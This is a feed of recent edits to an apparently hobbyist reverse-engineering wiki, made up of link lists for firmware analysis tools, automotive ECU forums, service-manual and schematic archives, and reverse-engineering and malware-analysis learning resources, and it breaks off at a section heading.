:: ➤ Silicon Motion Sm3281n [https://flash-extractor.com/library/SM/SM3281/SM3281N%20BB__2c_a4_08_32__1x8 click here for details (Flash-extractor library)]&lt;br /&gt;
:: ➤ Chipsbank CBM2099E [https://flash-extractor.com/library/CBM/CBM2099/ click here for details (Flash-extractor library)]&lt;br /&gt;
&lt;br /&gt;
=====Nand Controller firmwares &amp;amp; datasheets=====&lt;br /&gt;
USBDev.ru is a great resource.&lt;br /&gt;
&lt;br /&gt;
:: [https://www.usbdev.ru/files/ usbdev.ru/files/]&lt;br /&gt;
:: [https://www.usbdev.ru/databases/ usbdev.ru/databases/]&lt;br /&gt;
&lt;br /&gt;
====The final chapter ====&lt;br /&gt;
Analyzing dumped data. You might also find the [[Software_Tools#|software category interesting.]]&lt;br /&gt;
::* Analyzing &amp;amp; unpacking firmware blobs&lt;br /&gt;
:::;- [https://github.com/onekey-sec/unblob Unblob]&lt;br /&gt;
:::;- [https://github.com/ReFirmLabs/binwalk Binwalk]&lt;br /&gt;
:::;- [https://github.com/gchq/CyberChef CyberChef]&lt;br /&gt;
:::;- [https://github.com/BinaryResearch/centrifuge-toolkit Centrifuge]&lt;br /&gt;
:::;- [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Tools (FAT)]&lt;br /&gt;
:::;- [https://github.com/fkie-cad/FACT_core FACT (Firmware Analysis and Comparison Tool)]&lt;br /&gt;
&lt;br /&gt;
::* Disassemblers&lt;br /&gt;
:::;- [[Software_Tools#Interactive_Disassemblers_.28static_analysis.29|Interactive Disassemblers (static analysis)]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Automotive&amp;diff=3290</id>
		<title>Automotive</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Automotive&amp;diff=3290"/>
		<updated>2026-04-01T15:10:12Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: CAr/Truck navigation system added in dev index + TomTom Bridge (4FI70).&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Jeep Fuses.jpg|thumb|Fuse box in a Jeep Wrangler]]&lt;br /&gt;
Everything related to reverse engineering automobiles, motorcycles or anything similar.&lt;br /&gt;
==Device Index==&lt;br /&gt;
&lt;br /&gt;
===On Vehicle Targets===&lt;br /&gt;
[[Yamaha EBike Battery Dongle]] - A way to use Homemade and Third party batteries on a E-Bike that requires communication to be able to turn on.&lt;br /&gt;
&lt;br /&gt;
[[Zadi E-Lock system]] - Motorcycle Key, lock and immobilizer system.&lt;br /&gt;
&lt;br /&gt;
===Aftermarket Parts or Accessories===&lt;br /&gt;
[[Parking_Pilot]]&lt;br /&gt;
&lt;br /&gt;
[[Starcom Helios]] - GPS/GSM vehicle tracking device (fleet management)&lt;br /&gt;
&lt;br /&gt;
[https://www.bobadams5.com/posts/yadadashcam/ Yada 720P Roadcam Dashcam]&lt;br /&gt;
&lt;br /&gt;
===Car and Truck GPS Navigator systems===&lt;br /&gt;
[https://wiki.recessim.com/view/TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70) TomTom BRIDGE 7&amp;quot; Truck/Pro 8275 (4FI70)]&lt;br /&gt;
&lt;br /&gt;
===Cluster Swap / Modification===&lt;br /&gt;
[https://wiki.recessim.com/view/Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod Cluster Wiring Mod Toyota Paseo L17 GT in P9 Starlet]&lt;br /&gt;
&lt;br /&gt;
==Automotive Communication Interfaces==&lt;br /&gt;
Automotive electronics often communicate with protocols that are not common to other industries. Examples of automotive communication protocols include [[CAN]], [[LIN]], [[SENT]], and [[Ethernet]]&lt;br /&gt;
&lt;br /&gt;
===ECU Tuning, Repair &amp;amp; Reverse engineering communities / forums===&lt;br /&gt;
&lt;br /&gt;
*[https://carmasters.org/ CarMasters] - is a Russian‑language online forum dedicated to diagnosing, repairing, and discussing auto electronics and electromechanics across a wide range of car brand.&lt;br /&gt;
*[http://carcd.ru/forum/ CarCD] - is a Russian-language online community focused on automotive diagnostics, ECU tuning, repair tools, software sharing, and technical discussions for car electronics and chip tuning enthusiasts.&lt;br /&gt;
*[https://www.digital-kaos.co.uk/forums/ Digital Kaos] – is a broad tech forum with a strong auto diagnostics and ECU programming section.&lt;br /&gt;
*[https://garageforum.org/ GarageForum] - is an English-language forum focused on automotive software, diagnostics, workshop manuals, hardware tools, and technical support for car electronics and tuning.&lt;br /&gt;
*[https://mhhauto.com/ MHH Auto] - is a membership‑based community for sharing and discussing automotive software, ECU/airbag/dash activation keys, workshop manuals, tuning tools, and technical resources for educational and experimental car electronics projects.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3289</id>
		<title>TomTom BRIDGE 7&quot; Truck/Pro 8275 (4FI70)</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=TomTom_BRIDGE_7%22_Truck/Pro_8275_(4FI70)&amp;diff=3289"/>
		<updated>2026-04-01T15:08:07Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: initial commit. Work in progress..&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;WIP.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3284</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3284"/>
		<updated>2026-02-11T22:20:11Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Enshitification update&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
====Paid sources (various fields)====&lt;br /&gt;
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
